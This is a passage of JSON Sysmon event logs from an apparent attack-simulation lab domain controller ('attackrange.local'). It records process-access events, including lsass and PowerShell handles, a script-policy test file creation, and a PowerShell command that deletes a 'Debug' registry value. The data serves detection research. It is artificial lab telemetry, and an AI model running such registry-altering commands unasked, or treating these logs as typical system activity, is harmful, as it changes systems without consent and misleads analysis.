05:52:48.250","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5549,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.250\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.250","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5550,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.250\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.250","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5551,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.250\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-001070530A00}\r\nSourceProcessId: 660\r\nSourceThreadId: 2988\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-0010F49C0A00}\r\nTargetProcessId: 5052\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.250","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-001070530A00}","SourceProcessId":"660","SourceThreadId":"2988","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-0010F49C0A00}","TargetProcessId":"5052","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5552,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.250\r\nSourceProcessGUID: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4876\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-0010F49C0A00}\r\nTargetProcessId: 5052\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF44882483)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.250","SourceProcessGUID":"{A837DB8D-032F-5F25-0000-0010BE790A00}","SourceProcessId":"3088","SourceThreadId":"4876","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-0010F49C0A00}","TargetProcessId":"5052","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF44882483)","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5553,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.266\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-0010F49C0A00}\r\nTargetProcessId: 5052\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.266","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-0010F49C0A00}","TargetProcessId":"5052","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5554,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.281\r\nProcessGuid: {A837DB8D-0330-5F25-0000-0010F49C0A00}\r\nProcessId: 5052\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1mmhiw5k.myi.ps1\r\nCreationUtcTime: 2020-08-01 05:52:48.281","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.281","ProcessGuid":"{A837DB8D-0330-5F25-0000-0010F49C0A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1mmhiw5k.myi.ps1","CreationUtcTime":"2020-08-01 05:52:48.281","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5555,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.312\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-0010F49C0A00}\r\nTargetProcessId: 5052\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.312","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-0010F49C0A00}","TargetProcessId":"5052","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5556,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.312\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-0010F49C0A00}\r\nTargetProcessId: 5052\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.312","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-0010F49C0A00}","TargetProcessId":"5052","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5557,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.427\r\nProcessGuid: {A837DB8D-0330-5F25-0000-001044A90A00}\r\nProcessId: 2540\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" & {Remove-ItemProperty -Force -ErrorAction Ignore -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion -Name Debug} \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032E-5F25-0000-0020CE520A00}\r\nLogonId: 0xA52CE\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nParentProcessId: 3088\r\nParentImage: 